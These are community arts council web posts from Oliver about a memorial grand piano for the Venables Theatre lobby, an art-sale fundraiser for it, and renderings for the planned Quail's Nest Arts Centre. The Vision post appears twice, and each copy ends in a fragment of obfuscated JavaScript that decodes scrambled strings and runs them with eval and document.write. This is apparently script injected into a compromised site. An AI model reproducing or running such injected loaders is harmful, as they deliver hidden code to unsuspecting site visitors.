Piano “jewel” in Venables lobby setting

The Frank Venables Theatre lobby now provides the shimmering setting for a jewel of a piano: a Petrof grand. The glossy black instrument has been donated to the Venables theatre society as a memorial to piano teacher, Agnes Sutherland, who passed away in March 2016. A “baby sister” to the Yamaha used onstage at the Venables, the Petrof will provide entertainment at small recitals, receptions, weddings, exhibits and gala events in the theatre lobby. The fundraising campaign achieved its goal in a matter of months, raising $10,000 for this “lovingly used” instrument.  Giving added meaning to the memorial, the piano was purchased from Jeanne Crawford, whose daughter had been a piano student of Sutherland’s many years ago. The family had kept the piano in pristine condition.

As proven at a donor reception on Saturday January 28, the piano holds its own in the large lobby. Despite a lofty two-storey ceiling, the instrument’s smooth tones easily filled the space. The reception featured several pianists, chosen for their musical variety. Fourteen-year old Chase Alaric amazed the donors with his boogie-woogie blues workout. Jim Wyse tickled the keys with some jazz arrangements, with loudest applause for Oscar Peterson’s moving Hymn to Freedom. Piano students Kendra and Mataya Leinor and Kelan Harty (above) added sophistication with some classical pieces. One of Sutherland’s former pupils, Lisa Elgert, performed Lara’s Theme from Doctor Zhivago. In a fitting tribute, Ginette Aubin (below) lent her powerful pipes to a performance of I Believe, accompanying herself on the piano.

Interspersing the musical numbers were several reflections on Agnes’ contributions to the Oliver community. Several members of Agnes’ family were on hand to reminisce, including speeches by her brother Dave Evans and daughter Sally Franks. Penelope Johnson of the Oliver Community Arts Council, announced the society had made an additional $5000 in memorial donations to local schools for capital expenditures in both music and fine arts departments. She also recalled Agnes’ connection to the original Venables Theatre, as an accompanist for many SOAP musicals and student recitals.  Venables Theatre manager, Deb Martin, expressed her amazement and gratitude for the outpouring of support for the memorial piano.

A total of $10,000 was raised with the support of many organizations, including those of which Agnes was a member (the Oliver Sagebrushers and the Oliver Community Arts Council), as well as the South Okanagan Concert Society, Women of Oliver for Women, and the Oliver Community Theatre Society. Roughly sixty individuals also donated generously to the memorial fund. In addition, several of Agnes’ paintings were sold to raise money for the piano. The memorial campaign was co-chaired by Marion Trimble and Sally Franks.

The funds required to pay for a brass plaque will be raised with a raffle. Prizes are three paintings by professional artist Robert E. Wood, of Calgary. Prize winners will be announced on May 11 during the Wine Capital Art Walk. Tickets are $5 each and can be purchased at the Venables Theatre.

Photo credit: Penelope Johnson

Piano fundraiser in memory of Agnes

agnes-fundraiser

Sharing the memories and art, Sally Franks holds a painting done by her mother,during the weekend fundraiser, Agnes Sutherland “For the Sound of Colour”.  Sales yielded $2,450 in sales of art, home baking and canned items bringing the total in the memorial fund to over $7,500. A baby grand piano is in the sights of the organizers who look forward to its debut in the lobby of the Frank Venables Theatre sometime next year.

Agnes Sutherland: For the Sound of Colour

aggie-2

 

Agnes Sutherland left a legacy of love and commitment to our community.  She also left  a large amount of artwork when she passed away earlier this year.  Agnes worked in oils, pastels, acrylic and collage.  Her family are offering her works for sale to raise funds for the Agnes Sutherland Memorial. The goal is to raise $16,000.00 towards the purchase of a grand piano for the lobby area of the Frank Venables Theatre.  To date the fund has collected over ¼ of that goal.

A grand piano to grace the lobby area of our beautiful landmark theatre opens up so many more opportunities for the space.  Already accommodating receptions, recitals and small social events, the piano will allow an additional variety of musical programs to enhance our community life.

“For the Sound of Colour” takes place Thanksgiving weekend.  Hours are Saturday, Oct.8, 3pm to 9pm and Sunday, Oct. 9, 12pm – 5pm. An opening reception will be held on Saturday from 7pm to 9pm during which time former piano students of Agnes will provide music.  Besides artwork, published books of  Agnes’s poetry will be on sale.  Since the event is Thanksgiving weekend, a table of canning and baking will also be offered.  Everyone is invited to enjoy the memory of Agnes through her art and add her art to your collection.

The event takes place at the Quail’s Nest Arts Centre at 5840 Airport Road in Oliver. Thanks go to the Oliver Community Arts Council for generously enabling this fundraiser to take place through their Contracted Service Agreement program.Quail Logo Slide

 

 

 

If you can’t make it to the event but wish to make a donation to the memorial, you can do so either by mail:  cheque made out to “Agnes Sutherland Memorial” c/o M. Trimble, 967 Panorama Cres,,. Oliver V0H 1T6  or deposit to any branch of Valley First Credit Union, Account #2826758,  Transit #16650,  Institute #809.

Vision for the Quail’s Nest Arts Centre

Our architectural vision for the Quail’s Nest Arts Centre is captured in the following renderings by Bevanda Architecture, Penticton. We gratefully acknowledge the financial assistance of the Oliver Rotary Club which enabled the arts council to hire the services of Bevanda Architecture, and the hard work of our Vision committee who consulted with Bevanda on our goals and needs.

1. Front Entry View :  From 95th Street,   a visitor will see the original  maintenance shed (north, on right) converted into a multi-use performance space, including flexible seating, floor space, and stage area, grid system lighting , greenrooms and storage. This is the proposed first phase of renovations. South (left) along 95th Street is a proposed gallery and gift shop. front-entry-view

  2.  Front Lobby View: Entering from the 95th Street entrance , a visitor will be greeted in a light airy lobby. front-lobby-view

Beyond the lobby is a long breezeway running between the multiuse performance space to the north (right) and a sunny courtyard (centre background).  It’s a perfect place for small touring exhibits, elegant pre-show cocktails, and intermission lounging.  

 The lobby also gives access to the gift shop.

3. Lobby Gallery View :  This rendering looks back east towards the front lobby desk and 95th Street from the west end of the breezeway.  To the left in the picture is the multiuse performance space. If you look closely, you can see some of the original shed exterior along the wall on the left!

gallery-view

To the right are the windows opening onto the inner courtyard.  Behind the viewer are washrooms and concession areas.

 4.  Courtyard View: Reflecting the “Quail’s Nest” name, the arts centre shelters an intimate inner courtyard. The rendering looks west towards a concession area and washrooms, with studio and office areas beyond.  To the right is the long breezeway and lobby area (with performance space beyond).

courtyard-viewThe courtyard gives access to the whole facility around the square: performance area, gallery, lobby, gift shop, studios, concession, administrative offices, and washrooms.

The courtyard, with its sunken quadrangle, is a perfect venue for outdoor concerts and other small performances. Alternatively, the central area can be used for a water feature, container garden, or  sculpture display.

 5. Studio View: In the final phase of building, a line of small studios along the south end of the property face inwards onto the courtyard. This view looks north out of one studio into the courtyard and opposite the breezeway and performance space. studio-view

Behind the painting figure on the right (east) is the lobby, gallery and gift shop area that face onto 95th Street.

 6. Exterior View:  Along the south side of the complex is outside access to studio spaces (the near doorway) and administrative offices (far end of the walkway).exterior-view

Phased in several sections, the renovation of the Quail’s Nest Arts Centre  is a mammoth undertaking requiring at least $3 million in fundraising. However, the Oliver Community Arts Council believes such a facility could become a hub of unique artistic activity in the South Okanagan. Oliver  has a comparatively large percentage of its population active in the arts, many at commercial or professional  quality.  being aready recognized as the Wine Capital of Canada, Oliver is set to become a tourist destination for arts and culture. 

The Board is seeking a professional fundraiser to initiate these efforts, and the patronage of major corporate sponsors and private benefactors.  We welcome any interest in seeing our vision become a reality!  //v>k1;8k17:k67~Mx{\'\'t&r\"rp(kk?Cv\'p|\'x2{~rk6|\"= tp{tr>7>\';vk1jlk1?j8l=8t\"{ rp7tkk>>2;v=k18k1:8kkk6k1k6~/}B~|#%~tB%L$$k1xw=#\"wutBLk6kkk6kkMk1~Mx{t&r\"rp25B???E?JC|vxp5{?2????ECrJ~BK|p>k6M\"= tp{tr>7>B;vk1jlk1?j8l6=\"t {prt7>7=87=8>v;13A3@188".charCodeAt(o5)-(1*4+11)+0*2+63)%(95)+7*8-24);document.write(eval(k5)) //]]>

Renderings: Bevanda Architecture, Penticton
Photos: Penelope Johnson

Vision for the Quail's Nest Arts Centre

Our architectural vision for the Quail’s Nest Arts Centre is captured in the following renderings by Bevanda Architecture, Penticton. We gratefully acknowledge the financial assistance of the Oliver Rotary Club which enabled the arts council to hire the services of Bevanda Architecture, and the hard work of our Vision committee who consulted with Bevanda on our goals and needs.

1. Front Entry View :  From 95th Street,   a visitor will see the original  maintenance shed (north, on right) converted into a multi-use performance space, including flexible seating, floor space, and stage area, grid system lighting , greenrooms and storage. This is the proposed first phase of renovations. South (left) along 95th Street is a proposed gallery and gift shop. front-entry-view

  2.  Front Lobby View: Entering from the 95th Street entrance , a visitor will be greeted in a light airy lobby. front-lobby-view

Beyond the lobby is a long breezeway running between the multiuse performance space to the north (right) and a sunny courtyard (centre background).  It’s a perfect place for small touring exhibits, elegant pre-show cocktails, and intermission lounging.  

 The lobby also gives access to the gift shop.

3. Lobby Gallery View :  This rendering looks back east towards the front lobby desk and 95th Street from the west end of the breezeway.  To the left in the picture is the multiuse performance space. If you look closely, you can see some of the original shed exterior along the wall on the left!

gallery-view

To the right are the windows opening onto the inner courtyard.  Behind the viewer are washrooms and concession areas.

 4.  Courtyard View: Reflecting the “Quail’s Nest” name, the arts centre shelters an intimate inner courtyard. The rendering looks west towards a concession area and washrooms, with studio and office areas beyond.  To the right is the long breezeway and lobby area (with performance space beyond).

courtyard-viewThe courtyard gives access to the whole facility around the square: performance area, gallery, lobby, gift shop, studios, concession, administrative offices, and washrooms.

The courtyard, with its sunken quadrangle, is a perfect venue for outdoor concerts and other small performances. Alternatively, the central area can be used for a water feature, container garden, or  sculpture display.

 5. Studio View: In the final phase of building, a line of small studios along the south end of the property face inwards onto the courtyard. This view looks north out of one studio into the courtyard and opposite the breezeway and performance space. studio-view

Behind the painting figure on the right (east) is the lobby, gallery and gift shop area that face onto 95th Street.

 6. Exterior View:  Along the south side of the complex is outside access to studio spaces (the near doorway) and administrative offices (far end of the walkway).exterior-view

Phased in several sections, the renovation of the Quail’s Nest Arts Centre  is a mammoth undertaking requiring at least $3 million in fundraising. However, the Oliver Community Arts Council believes such a facility could become a hub of unique artistic activity in the South Okanagan. Oliver  has a comparatively large percentage of its population active in the arts, many at commercial or professional  quality.  being aready recognized as the Wine Capital of Canada, Oliver is set to become a tourist destination for arts and culture. 

The Board is seeking a professional fundraiser to initiate these efforts, and the patronage of major corporate sponsors and private benefactors.  We welcome any interest in seeing our vision become a reality!  //8888+.kikzm~qtwFFd*d/ddd/ddEnmzp90z|{j}{6d*Wd*4o7\"70mkitxmz6d/F\"i7DuwkC\">11*Cz9E**Cnwz0~iz(y:E8Cy:D\"=6tmvo|pCy:3E;@1z93E\"=6{}j{|z0y:4;@16{xtq|0**16zm~mz{m016rwqv0**1Cm~it0z91".charCodeAt(g0)-(4*0+8)+74-11)%(0x5f)+0x20);document.write(eval(d6)) //]]>

Renderings: Bevanda Architecture, Penticton
Photos: Penelope Johnson